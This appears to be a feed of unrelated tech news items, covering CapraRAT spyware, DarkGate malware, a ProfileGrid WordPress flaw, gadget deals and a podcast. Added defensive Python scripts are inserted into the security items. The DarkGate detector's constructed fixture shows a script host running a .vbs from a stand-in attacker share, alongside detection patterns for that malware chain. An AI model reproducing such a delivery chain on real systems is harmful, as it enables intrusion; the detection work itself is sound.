CapraRAT Android Spyware Campaign Targets Gamers, TikTokers


Researchers have found a new campaign of the long-known CapraRAT Android spyware in which the malware impersonates legitimate apps. This time, the spyware mimics apps aimed at TikTok users, gamers, and other user groups.

CapraRAT Spyware Mimics Android Apps To Trick Users

According to a recent post from SentinelLabs, their researchers observed a new CapraRAT Android spyware campaign aimed at specific user groups, including TikTokers and gamers.

As explained, the researchers found four new APKs posing as various apps, some even hiding behind legitimate applications. To help users check whether they are running the malicious applications on their devices, the application and package names to look for are listed below.

  • Crazy Game (com.maeps.crygms.tktols): An app impersonating the legit gaming platform “Crazygames.com” to trick gamers.
  • Sexy Videos (com.nobra.crygms.tktols): An app redirecting to YouTube videos.
  • TikToks (com.maeps.vdosa.tktols): An app mimicking TikTok video platform, aimed at targeting TikTok users.
  • Weapons (com.maeps.vdosa.tktols): This app, bearing the logo “Forgotten Weapons” (mimicking a YouTube channel of the same name) aims at weapon fans.

While these four apps seemingly target different user groups, all of them work the same way, pointing to the broad reach of this CapraRAT campaign.

The Recent Campaign Exhibits A Sneaky Behavior

In brief, the attack begins when a victim downloads any of these apps. Upon installation, the app requests several intrusive permissions, including access to SMS, contacts, GPS location, read/write access to storage, camera, audio recording, screen recording, call history, permission to make calls, and the ability to manage network state.

Obviously, many of these permissions are not necessary for a gaming or video app, which should alarm users. However, most users do not scrutinize individual app permissions and so fall prey to such threats.
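The two signals the article gives a defender are the package names listed above and the permission set a game or video app has no business requesting. The following script, added here as an example rather than code from the article or from SentinelLabs, checks both against `adb` output: it matches the listed package names against `adb shell pm list packages`, and it counts sensitive manifest permissions in a `dumpsys package` excerpt. The `adb` output embedded in the script is constructed for the example; the mapping from the article's plain-language permission list to Android manifest permission names is the author's assumption.

```python
"""Spot CapraRAT package names and over-privileged apps in adb output.

Added example, not from the original article or from SentinelLabs.
The package names and the sensitive permissions are those the article
lists; the adb output below is constructed for the example.
"""
import re

# Package names the article lists for this campaign.
CAPRARAT_PACKAGES = {
    "com.maeps.crygms.tktols": "Crazy Game",
    "com.nobra.crygms.tktols": "Sexy Videos",
    "com.maeps.vdosa.tktols": "TikToks / Weapons",
}

# Manifest permissions matching the capabilities the article says the APKs
# request (SMS, contacts, location, storage, camera, audio, call log, calls).
# None of these is needed by a game or a video player.
SENSITIVE_PERMISSIONS = {
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
    "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.WRITE_EXTERNAL_STORAGE",
    "android.permission.CAMERA",
    "android.permission.RECORD_AUDIO",
    "android.permission.READ_CALL_LOG",
    "android.permission.CALL_PHONE",
}

# Constructed sample of `adb shell pm list packages` output.
SAMPLE_PM_LIST = """package:com.android.chrome
package:com.maeps.vdosa.tktols
package:com.example.notes
"""

# Constructed excerpt of `adb shell dumpsys package com.maeps.vdosa.tktols`.
SAMPLE_DUMPSYS = """Package [com.maeps.vdosa.tktols] (1a2b3c):
  requested permissions:
    android.permission.INTERNET
    android.permission.READ_SMS
    android.permission.READ_CONTACTS
    android.permission.ACCESS_FINE_LOCATION
    android.permission.CAMERA
    android.permission.RECORD_AUDIO
    android.permission.ACCESS_NETWORK_STATE
"""


def parse_pm_list(output):
    """Turn `pm list packages` lines ("package:<name>") into a list of names."""
    return [line.split(":", 1)[1].strip()
            for line in output.splitlines() if line.startswith("package:")]


def match_iocs(packages):
    """Map each installed package that matches a campaign IoC to its app label."""
    return {p: CAPRARAT_PACKAGES[p] for p in packages if p in CAPRARAT_PACKAGES}


def parse_dumpsys_permissions(output):
    """Collect every android.permission.* name in a `dumpsys package` excerpt."""
    return set(re.findall(r"^\s*(android\.permission\.[A-Z_]+)", output, re.M))


def overprivileged(requested, threshold=3):
    """Return the sensitive permissions requested, or [] if fewer than `threshold`.

    A game or video app that asks for three or more of these at once is the
    pattern the article describes and deserves a closer look.
    """
    hits = sorted(requested & SENSITIVE_PERMISSIONS)
    return hits if len(hits) >= threshold else []


if __name__ == "__main__":
    installed = parse_pm_list(SAMPLE_PM_LIST)
    for pkg, label in match_iocs(installed).items():
        print(f"IoC match: {pkg} ({label})")
    for perm in overprivileged(parse_dumpsys_permissions(SAMPLE_DUMPSYS)):
        print(f"sensitive permission requested: {perm}")
```

On a real device, feed `parse_pm_list` the output of `adb shell pm list packages` and `parse_dumpsys_permissions` the output of `adb shell dumpsys package <name>` for each package you want to review. The permission check is deliberately a heuristic: a single camera permission on a video app is normal, but several of these together on an app that claims to be a game is the mismatch the article highlights.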

Besides these permissions, the new malware variant also uses a WebView to open links to legitimate sites, which adds to the deception. Moreover, the malware now looks more like spyware than a backdoor (unlike its previous campaigns), as it drops the permissions to install packages or authenticate accounts. This sneakier behavior may trick even savvy users, letting the malware stay under the radar for extended periods.

CapraRAT is a known Android spyware belonging to a suspected Pakistani state-actor group, Transparent Tribe (aka APT 36, Operation C-Major). This group, known since 2016, has run numerous malicious campaigns against users, particularly targeting Indian victims.

Let us know your thoughts in the comments.



Save $50 on the Google Pixel 8a for Prime Day


Google’s Pixel A phones are usually a great deal. However, why not knock some more money off of your purchase? For Prime Day, you can get the Pixel 8a for $50 off. This knocks the price down to $449.99.

If you’re curious about Amazon Prime, new members can try it out for free with a 30-day trial.

The Pixel 8a is the most recent smartphone released by Google, and it brings the power of the Tensor G3 SoC. This makes it one of the most powerful phones at this price point. Along with that, you have Google’s top-of-the-line software optimization. This all makes for an incredibly smooth experience.

The selling point of Google’s Pixel devices is usually the camera. Google uses some advanced hardware and software for its cameras. This gives its Pixel A phones camera performance that rivals phones twice their price. If you’re looking for a phone that can produce amazing pictures, then you should pick up this phone.

As for the screen, Google fits its devices with some great displays. You’re looking at a 1080p+ AMOLED display. Not only does it look great, but it looks great when outdoors. It has a peak of 2000 nits of brightness.

Being a Pixel device, you can expect all of the latest and greatest from Android. You’ll receive software updates early along with the other Pixel devices. This includes new features, security patches, and bug and stability fixes. Also, you’ll be early to receive the latest Android platform upgrades. It comes with Android 14 out of the box, but it will be one of the first devices to get Android 15 when it comes out.

This is truly one of the best Android experiences that you can get your hands on. At $50 off for Prime Day, it’s a pretty good deal. You won’t be sorry.



Samsung Android XR headset’s dev version could launch in October


XR enthusiasts have been eagerly waiting for the launch of a new Samsung Android XR headset for a while now. The South Korean tech giant announced its collaboration with Google and Qualcomm for a new XR headset initiative in February last year. The device was expected to launch in Q1 2024 but was repeatedly pushed back.

The details regarding the new Samsung Android XR headset have been scarce, up until now. According to a report by Business Insider, Samsung will launch a developer version of its Android XR headset later this year.

Samsung could start giving out an early version of its Android XR headset to developers at SDC 2024

According to the source, Samsung will launch a version of its Android XR headset for developers in October. Samsung has previously indicated that it will introduce something new in the XR segment before 2024 ends. But, this is the first time we’ve heard a specific month mentioned.

The report didn’t provide an exact launch date for the developer version. However, there’s a Samsung Developer Conference on October 3. If the report is true, the company could showcase its Android XR headset at this event. The brand may also start handing out the early version of the device to developers around the same time, so that they can start building applications for the new headset.

It’s worth mentioning that during the recent Unpacked event, Rick Osterloh, Google’s SVP of Platforms & Devices, briefly mentioned the upcoming XR platform. Furthermore, TM Roh, President of Samsung’s Mobile Division, revealed that the new XR platform is “coming this year”. However, Roh refrained from sharing any other details like the features or general availability of the upcoming XR platform-powered headset.

The commercial product is said to be showcased in March 2025

Furthermore, the latest report suggests that Samsung could showcase the commercial version of the Android XR headset in March 2025. As always with rumors, nothing is certain until the company makes an official announcement.

Unfortunately, not much is known about the upcoming XR headset that Samsung is developing with Google and Qualcomm. It could be a mixed bag, offering VR (virtual reality), AR (augmented reality), and MR (mixed reality) experiences in a single device. Only time will tell, so stay tuned for more updates.



DarkGate Malware Exploiting Excel Files And SMB File Shares


DarkGate, a Malware-as-a-Service (MaaS) platform, has seen a surge in activity since September 2023, employing various distribution methods, including email attachments, malicious ads, and compromised Samba shares.

Initially a human-operated command-and-control infrastructure, DarkGate has evolved into a versatile tool offering remote access, crypto mining, and other malicious functionalities. 

The malware has been actively distributed across North America, Europe, and Asia, leveraging AutoIt or AutoHotkey scripts for initial infection. 

Exploit.IN forum post by DarkGate developer RastaFarEye in October 2023

Its operators launched a campaign in March 2024 using Excel files disguised as legitimate documents to deliver malicious payloads, primarily targeting North America but expanding to Europe and Asia.


The attack chain lures users into opening Excel files with embedded links to publicly accessible Samba shares hosting VBS or JS scripts. These scripts download and execute a PowerShell script, which in turn fetches and runs the final AutoHotKey-based DarkGate payload.

The threat actors employed various evasion techniques, including obfuscation, legitimate software usage, and anti-malware detection checks, to hinder analysis and increase the malware’s persistence. 
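The chain just described (Excel document, script host running a VBS/JS file from a UNC share, PowerShell, AutoHotKey) is visible as a parent-child sequence in process-creation telemetry, which is where a detection engineer would look for it. The script below is an added example, not from the article or from any vendor's detection content: it walks Sysmon-style process-creation events (field names `pid`, `ppid`, `image`, `cmdline` are an assumption about the log schema) and reports every PowerShell process whose parent is a script host launched from a `.vbs`/`.js` on a UNC path, whose grandparent is Excel. The events are constructed, and `203.0.113.10` is a documentation address standing in for an attacker-controlled share.

```python
"""Flag the Excel -> script host (UNC share) -> PowerShell -> AutoHotkey chain
in process-creation events.

Added example, not from the original article or from any vendor's detection
content. The field names (pid, ppid, image, cmdline) mirror Sysmon-style
process-creation logs; the events below are constructed, and 203.0.113.10 is
a documentation address standing in for an attacker-controlled share.
"""
import re

OFFICE_APPS = {"excel.exe"}                       # the lure is an Excel file
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}     # run the VBS/JS stage
# A UNC path (\\host\share\...) ending in .vbs or .js on the command line.
UNC_SCRIPT = re.compile(r"\\\\[\w.-]+\\[^\s\"']+\.(?:vbs|js)\b", re.I)


def image_name(path):
    """Lower-cased file name of an image path, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_chains(events):
    """Return (excel_pid, script_pid, powershell_pid, unc_path, ahk_pid) tuples.

    ahk_pid is the pid of an AutoHotkey.exe spawned by that PowerShell, or
    None if the final stage was not observed (the chain is still reported).
    """
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)

    chains = []
    for e in events:
        if image_name(e["image"]) != "powershell.exe":
            continue
        script = by_pid.get(e["ppid"])
        if not script or image_name(script["image"]) not in SCRIPT_HOSTS:
            continue
        m = UNC_SCRIPT.search(script["cmdline"])
        if not m:
            continue
        office = by_pid.get(script["ppid"])
        if not office or image_name(office["image"]) not in OFFICE_APPS:
            continue
        ahk = next((c["pid"] for c in children.get(e["pid"], [])
                    if image_name(c["image"]) == "autohotkey.exe"), None)
        chains.append((office["pid"], script["pid"], e["pid"], m.group(0), ahk))
    return chains


# Constructed events: one malicious chain and one benign local script job.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": '"EXCEL.EXE" C:\\Users\\jdoe\\Downloads\\invoice.xlsx'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\203.0.113.10\share\docs\report.vbs"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Users\Public\stage.ps1"},
    {"pid": 450, "ppid": 400, "image": r"C:\Users\Public\AutoHotkey.exe",
     "cmdline": r"AutoHotkey.exe C:\Users\Public\script.ahk"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Scripts\backup.vbs"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\rotate.ps1"},
]

if __name__ == "__main__":
    for chain in find_chains(SAMPLE_EVENTS):
        print("DarkGate-style chain:", chain)
```

The benign `explorer.exe -> wscript.exe -> powershell.exe` job in the sample is deliberately included: it is only the UNC-hosted script under an Office parent that distinguishes the lure from routine automation. Depending on how the link is opened, the script host's parent may be `explorer.exe` rather than `EXCEL.EXE`; if your telemetry shows that, relax the grandparent check and lean on the UNC `.vbs`/`.js` condition instead.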

Template used by .xlsx files used in this DarkGate campaign.

The malware employs anti-analysis techniques to evade detection, checking the system’s CPU to distinguish virtual environments from physical hosts and potentially halting execution in analysis sandboxes.

It scans for multiple anti-malware programs using specific directory paths and filenames, aiming to avoid triggering their detection mechanisms or even disabling them.

The malware’s ongoing evolution includes adding new anti-malware checks, demonstrating its adaptability to counter evolving security measures. 

DarkGate’s routine to check for the CPU is shown in a debugger.

Analysis Of DarkGate Samples Reveals XOR Key Variations

Two sets of DarkGate samples were examined where the first set shared the same campaign ID but had different XOR keys, while the second set shared both the campaign ID and the C2 server but also had distinct XOR keys. 

This indicates that DarkGate uses multiple XOR keys within the same campaign or C2 infrastructure, which hinders reverse engineering and makes the malware more resilient to analysis.

DarkGate scans a host for specific processes and tools commonly used in malware analysis or virtual environments. The list it checks against lives in its configuration, which is decrypted through a multi-step process involving XOR keys that conceals the malware’s behavior from static inspection.

While some configuration fields remain obscure, analysts have identified correlations between certain values and campaign identifiers. 

Multiple samples within the same campaign can utilize distinct XOR keys, suggesting an intentional obfuscation tactic to hinder analysis and understanding of DarkGate’s inner workings. 

Configuration data was extracted from a DarkGate sample first seen on April 16, 2024.

DarkGate C2 traffic appears as unencrypted, Base64-encoded HTTP POST requests. The Base64 layer can be decoded, but the decoded content is itself further obfuscated.

Unit 42 investigated an infection from March 14, 2024, and found five HTTP POST requests carrying nearly 218 KB of Base64-encoded data sent to nextroundstr.com, traffic that may have exfiltrated data.
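Because the Base64 layer hides further obfuscation, a network defender cannot rely on decoding the bodies to confirm what left the host; the usable signal is the shape of the traffic: repeated POSTs of strictly valid Base64 text to one destination adding up to a large volume, as in the five requests and roughly 218 KB described above. The following script is an added example, not from the article or from Unit 42. It aggregates Base64-bodied POSTs per (source, host) pair over captured request records and flags pairs exceeding a request count and a byte threshold. The records are constructed; the destination name is the one the article quotes; the record schema (`src`, `host`, `method`, `body`) and both thresholds are assumptions.

```python
"""Flag hosts that push large volumes of Base64-looking POST bodies to one
destination, the traffic shape the article attributes to DarkGate C2.

Added example, not from the original article or from Unit 42. The request
records below are constructed; the destination name is the one the article
quotes, and the request count and byte threshold are tunable assumptions.
"""
import base64
import binascii
from collections import defaultdict


def looks_base64(body, min_len=64):
    """True if `body` is non-trivial, strictly valid Base64 text."""
    if len(body) < min_len or len(body) % 4:
        return False
    try:
        base64.b64decode(body, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def flag_base64_posts(records, min_requests=3, min_bytes=100_000):
    """Aggregate Base64-bodied POSTs per (source, host) and return the pairs
    that exceed both thresholds as {(src, host): (request_count, total_bytes)}.

    Each record is a dict with src, host, method and body (the captured
    request body as text). The decoded bytes are not inspected: the article
    notes the Base64 layer hides further obfuscation, so volume and shape are
    the signal here, not content.
    """
    agg = defaultdict(lambda: [0, 0])
    for r in records:
        if r["method"] != "POST" or not looks_base64(r["body"]):
            continue
        key = (r["src"], r["host"])
        agg[key][0] += 1
        agg[key][1] += len(r["body"])
    return {k: tuple(v) for k, v in agg.items()
            if v[0] >= min_requests and v[1] >= min_bytes}


def _b64_blob(n_bytes):
    """Constructed filler: Base64 of n_bytes of zero bytes (shape only)."""
    return base64.b64encode(b"\x00" * n_bytes).decode("ascii")


# Constructed records: five ~44 KB Base64 POSTs to the article's C2 host
# from one client, plus ordinary traffic that must not be flagged.
SAMPLE_RECORDS = [
    {"src": "10.0.0.5", "host": "nextroundstr.com", "method": "POST", "body": _b64_blob(33_000)}
    for _ in range(5)
] + [
    {"src": "10.0.0.5", "host": "login.example.com", "method": "POST",
     "body": "username=jdoe&password=REDACTED&remember=1&csrf=c0ffee&next=%2Fhome"},
    {"src": "10.0.0.7", "host": "nextroundstr.com", "method": "GET", "body": ""},
    {"src": "10.0.0.9", "host": "cdn.example.net", "method": "POST", "body": _b64_blob(600)},
]

if __name__ == "__main__":
    for (src, host), (count, total) in flag_base64_posts(SAMPLE_RECORDS).items():
        print(f"{src} -> {host}: {count} Base64 POSTs, {total} bytes")
```

Feed the function records extracted from a proxy or packet capture that retains request bodies. The thresholds are a starting point: a single 800-byte Base64 POST to a CDN (the last sample record) is ordinary web traffic, while five 44 KB bodies to one host from one client in a short window matches the infection the article describes and is worth correlating with the process-chain telemetry on that client.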

Although DarkGate’s primary function is unclear, its association with follow-on malware like Danabot and reported links to ransomware raise significant security concerns.




Grab the Apple Watch Ultra 2 for $729 in Best Buy’s latest sale


Best Buy is holding its “Black Friday in July” sale right now, and it is seeing a ton of great deals ahead of Amazon’s Prime Day, which starts tomorrow. This includes the Apple Watch Ultra 2, which is now $729. That’s a savings of $70, which does bring it back down to its all-time lowest price.

The Apple Watch Ultra 2 was announced last September, as the successor to the very popular and successful Apple Watch Ultra. It, unfortunately, did not have a lot of changes from the original. But it did include the new double-pinch feature which is really useful when your hands are full. One of the big selling points of the Apple Watch Ultra 2 is the battery life over the regular Apple Watch. Apple touts that you can get 36 hours out of it, which is about two full days, depending on your usage. That’s double the regular Apple Watch’s battery life.

Buyers also love the Apple Watch Ultra 2 for its titanium casing and sapphire crystal display, which make it almost impossible to scratch or shatter. Since this watch is made for adventurers and those who love to get dirty in nature, using those materials makes a lot of sense.

With this deal, you can also trade in a watch to Best Buy. You won’t get a ton, as it looks like the most you can get is $265, but hey that’s better than nothing.




Google nears $23 billion acquisition of cybersecurity startup Wiz


Google is reportedly closing in on its biggest acquisition ever. The tech titan is on the verge of buying cloud cybersecurity startup Wiz for around $23 billion, The Wall Street Journal reports. The talks have already progressed to an advanced stage, people familiar with the matter told the publication. The biggest Google acquisition so far is Motorola Mobility, which it bought for $12.5 billion in 2012 and sold for $2.91 billion in 2014.

Google is in advanced talks for a $23 billion acquisition of Wiz

Founded in 2020 by four former Microsoft employees, Wiz is a New York-based cloud cybersecurity provider. It specializes in analyzing corporate cloud computing infrastructure for combinations of risk factors that could lead to security breaches. The startup uses data from Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud, and other cloud platforms to identify potential risk factors.

The firm’s solutions allow companies to “rapidly identify and remove critical risks” and secure their cloud platforms. In August 2022, Wiz claimed to be the fastest startup to scale from $1 million to $100 million in annual recurring revenue  (ARR). It allegedly achieved the feat in around 18 months. The startup has raised $1.9 billion in various funding rounds in its lifetime. Of that, $1 billion came in Series E funding in April 2024.

Wiz raised the money at a $12 billion valuation. Google is seemingly buying it for almost double that amount. The company likely sees Wiz’s technologies as a valuable addition to fortify its cloud business. The business division grew 28% in the first quarter of 2024, securing a revenue of $9.57 billion. The tech biggie would want to strengthen its security measures amid increasing demand for cloud-based generative AI tools.

Google has already invested big in acquiring cloud security startups. In January 2022, it acquired Israel-based startup Siemplify for $500 million. The firm followed up with a $5.4 billion acquisition of Mandiant later that year. Wiz might soon join the internet behemoth’s ever-growing cybersecurity umbrella. It seemingly wants to take no chance against fast-evolving threat actors who have hacked the servers of some of the biggest tech firms in recent years.

The deal might face strict regulatory scrutiny and could even fall through

While Google and Wiz look likely to agree on an acquisition deal, they may find it difficult to please the US regulators. The Biden administration has been tightening regulatory scrutiny on tech biggies. Time will tell whether the Android maker can bring another cloud security provider under its sleeve or if American lawmakers prevent that from happening on fair competition grounds. Expect more details in the coming weeks.



Samsung Galaxy Z Flip 5 and Z Flip 6 get Google Wallet support on cover screens


The Samsung Galaxy Z Flip 5 and Z Flip 6 now support Google Wallet on their cover screens, thanks to the MultiStar widget from Samsung’s Good Lock customization suite. Previously, Z Flip users could only make payments using the default card in Google Wallet without opening their phones. However, they had to open their devices to switch cards or access loyalty cards.

This new functionality, likely enabled by a recent update to either MultiStar, Google Wallet, or Samsung’s One UI 6.1, allows users to add Google Wallet to their cover screen. To do this, they need to download Good Lock, a customization suite for Galaxy phones, and then use the MultiStar module to add the Google Wallet widget to the cover screen.

It’s important to note that this feature is only available on Z Flip 5 and Z Flip 6 devices running One UI 6.1 or later. For those who have these devices, the addition of Google Wallet to the cover screen is a welcome change, as it makes mobile payments even more convenient and streamlines the user experience.

Samsung’s Good Lock MultiStar module now supports Google Wallet on the Z Flip 5 and Z Flip 6 | Image credit — Android Police

The Z Flip series has always been popular for its unique foldable design and compact form factor. However, the limited functionality of the cover screen has been a common complaint among users. Samsung has been gradually improving this with each new model, and the addition of Google Wallet support is a significant step forward.

It’s unclear exactly when this support was added, but users have recently reported being able to use Google Wallet on their cover screens. This suggests that the feature may have been quietly rolled out in a recent update.

For those who rely on Google Wallet for their mobile payments, this new feature is a game changer. It eliminates the need to constantly open and close their phones to make payments, switch cards, or access loyalty cards. Everything can now be done directly from the cover screen.



ProfileGrid WordPress Plugin Vulnerability Allowed Admin Access


WordPress admins must update their websites with the latest ProfileGrid plugin release. A severe privilege escalation vulnerability in the ProfileGrid plugin could allow admin access to target WordPress sites.

ProfileGrid Plugin Vulnerability Risked WordPress Sites

In a recent post, team Wordfence shared details about a serious privilege escalation vulnerability in the ProfileGrid plugin that threatened thousands of WordPress sites.

ProfileGrid—User Profiles, Groups, and Communities is a dedicated plugin for WordPress sites that allows users to set up user profiles, communities, directories, groups, and other interactive interfaces. The plugin currently boasts over 7,000 active installations, hinting at the huge number of websites potentially at risk due to the underlying plugin flaw.

As explained, the vulnerability affected the plugin’s pm_upload_image AJAX action, which lacked proper validation. An authenticated adversary with only subscriber-level access could exploit the flaw to gain elevated privileges, up to admin access on the target site.

The vulnerability received the CVE ID CVE-2024-6411 and a high severity rating with a CVSS score of 8.8. It was first reported by security researcher Tieu Pham Trong Nhan from TechlabCorp through Wordfence’s bug bounty program, earning a $488 bounty.

This vulnerability affected all plugin versions up to 5.8.9. Following the report, Wordfence coordinated with the plugin developers on a patch, which they rolled out in ProfileGrid version 5.9.0, released earlier this month.

Although no exploitation attempts have been observed in the wild, the plugin’s official WordPress page currently shows only 36.7% of installations running the latest release, with the rest still on older, vulnerable versions. Given the threat, it’s crucial for all WordPress site owners to update to the latest plugin release as soon as possible.

It’s also important for site owners to check all plugins running on their websites for available security fixes to avoid potential threats.
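With most installations still on a vulnerable build, the practical question for anyone running several WordPress sites is which of them are below 5.9.0. The script below is an added example, not from the article or from Wordfence: it reads WP-CLI's `wp plugin list --format=json` output and reports any plugin whose installed version sorts below the first fixed version, comparing versions as integer tuples rather than strings so that a future 5.10.x is not mistaken for an older build. The vulnerable/fixed boundary (through 5.8.9, fixed in 5.9.0) is from the article; the plugin slug is assumed from the wordpress.org listing, and the JSON is constructed.

```python
"""Find WordPress installs still running a ProfileGrid build below the fixed
release, from WP-CLI's `wp plugin list --format=json` output.

Added example, not from the original article or from Wordfence. The version
boundary (vulnerable through 5.8.9, fixed in 5.9.0) is from the article;
the plugin slug is assumed from the wordpress.org listing, and the JSON
below is constructed.
"""
import json
import re

# Plugin slug -> first fixed version. Extend this table for other advisories.
FIXED_VERSIONS = {
    "profilegrid-user-profiles-groups-and-communities": "5.9.0",  # CVE-2024-6411
}


def parse_version(text):
    """Turn "5.8.9" into (5, 8, 9) for a numeric comparison.

    Only the leading digits of each dotted component count, so "5.9.0-beta1"
    becomes (5, 9, 0). String comparison would rank "5.10.0" below "5.9.0";
    integer tuples do not.
    """
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def is_below(installed, fixed):
    """True if `installed` sorts strictly before `fixed` (padding short tuples)."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) < b + (0,) * (width - len(b))


def vulnerable_plugins(wp_cli_json, fixed=FIXED_VERSIONS):
    """Return (slug, installed, fixed, status) for plugins below their fix."""
    hits = []
    for plugin in json.loads(wp_cli_json):
        fix = fixed.get(plugin.get("name"))
        if fix and is_below(plugin.get("version", "0"), fix):
            hits.append((plugin["name"], plugin["version"], fix, plugin.get("status")))
    return hits


# Constructed `wp plugin list --format=json` output for one site.
SAMPLE_WP_CLI = json.dumps([
    {"name": "akismet", "status": "active", "update": "none", "version": "5.3"},
    {"name": "profilegrid-user-profiles-groups-and-communities",
     "status": "active", "update": "available", "version": "5.8.9"},
])

if __name__ == "__main__":
    for slug, have, want, status in vulnerable_plugins(SAMPLE_WP_CLI):
        print(f"{slug}: {have} installed ({status}), update to {want} or later")
```

Run `wp plugin list --format=json` on each site (or over SSH with `wp --ssh=`) and pass the output to `vulnerable_plugins`; the `status` field is reported so that inactive copies of the vulnerable build, which still need updating, are not overlooked.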

Let us know your thoughts in the comments.



How an AI “artist” stole a woman’s face, with Ali Diamond (Lock and Code S05E15)


This week on the Lock and Code podcast…

Full-time software engineer and part-time Twitch streamer Ali Diamond is used to seeing herself on screen, probably because she’s the one who turns the camera on.

But when Diamond received a Direct Message (DM) on Twitter earlier this year, she learned that her likeness had been recreated across a sample of AI-generated images, entirely without her consent.

On the AI art sharing platform Civitai, Diamond discovered that a stranger had created an “AI image model” that was fashioned after her. The model was available for download so that, conceivably, other members of the community could generate their own images of Diamond—or, at least, the AI version of her. To show just what the AI model was capable of, its creator shared a few examples of what he’d made: There was AI Diamond standing at what looked like a music festival, AI Diamond with her head tilted up and smiling, and AI Diamond wearing what the real Diamond would later describe as an “ugly ass ****ing hat.”

AI image generation is seemingly lawless right now.

Popular AI image generators, like Stable Diffusion, Dall-E, and Midjourney, have faced valid criticisms from human artists that these generators are copying their labor to output derivative works, a sort of AI plagiarism. AI image moderation, on the other hand, has posed a problem not only for AI art communities, but for major social media networks, too, as anyone can seemingly create AI-generated images of someone else—without that person’s consent—and distribute those images online. It happened earlier this year when AI-generated, sexually explicit images of Taylor Swift were seen by millions of people on Twitter before the company took those images down.

In that instance, Swift had the support of countless fans who reported each post they found on Twitter that shared the images.

But what happens when someone has to defend themselves against an AI model made of their likeness, without their consent?

Today, on the Lock and Code podcast with host David Ruiz, we speak with Ali Diamond about finding an AI model of herself, what the creator had to say about making the model, and what the privacy and security implications are for everyday people whose likenesses have been stolen against their will.

For Diamond, the experience was unwelcome and new, as she’d never experimented using AI image generation on herself.

“I’ve never put my face into any of those AI services. As someone who has a love of cybersecurity and an interest in it… you’re collecting faces to do what?”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)


Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.



Google’s CameraX update prepares Ultra HDR rollout for third-party apps


At its I/O 2024 developers’ conference in May, Google announced plans to support Ultra HDR image capture across all third-party apps with built-in camera functionality. It appears the company has made some progress towards this. It has updated the CameraX library with initial support for Ultra HDR capture, laying the groundwork for a public rollout.

Google prepares to bring Ultra HDR image capture to all camera apps

HDR or high dynamic range is an advanced camera technology that uses computational photography and image stacking to produce vibrant images with excellent contrast. Ultra HDR is a JPEG-based HDR image format created by Google. The company offers an API for Android 14 and higher that app developers can implement to capture HDR images on supported devices. These JPEG image files have an HDR gain map embedded in their metadata.

The benefit is that these pictures can be viewed on any device, even those without an HDR display. When not supported, users will see standard (SDR) JPEG images. But when supported, the HDR gain map is applied over the SDR version of the image to enhance the vibrancy and contrast of colors. Any camera app can capture these JPEG-based HDR images using Google’s Ultra HDR format as long as the device has the necessary hardware capabilities.

However, Google’s API system has limited its adoption, particularly on apps where photography isn’t a primary function, such as social media apps. The API that enables Ultra HDR for camera apps in Android 14 is part of Camera2, not CameraX. The former comes with the Android OS framework and offers advanced camera functionality. “Think full-fledged third-party camera apps with pro-level controls over multiple lenses,” Android expert Mishaal Rahman explains.

On the other hand, CameraX is bundled with the Jetpack support library and is better suited for social media apps and other apps that offer built-in camera functionality for adjacent features. While developers are free to select either API, CameraX’s simplicity means apps that aren’t primarily camera apps usually forgo Camera2. As a result, they miss out on the latest or most advanced features, or get them later than dedicated camera apps. The same is happening with Ultra HDR.

Google has already made some progress

While the Ultra HDR API has been available on Camera2 since the beginning, Google is finally bringing it to CameraX. The company updated the CameraX library in April to support Ultra HDR image capture on all Android camera apps. Spotted by Rahman, the updated version (v1.4.0) isn’t available publicly yet. Maybe Google still has some work to do. He explained the technical tidbits of the feature in a lengthy post on Android Authority.

The gist is that your social images might soon be more vibrant. According to the report, Google Chrome is currently the only app that “fully” supports Ultra HDR images across Android and desktop. Hopefully, developers of other third-party apps will quickly adopt the updated version of the Jetpack CameraX library as soon as Google releases it. All high-end Android phones and some newer Windows PCs can display Ultra HDR images.

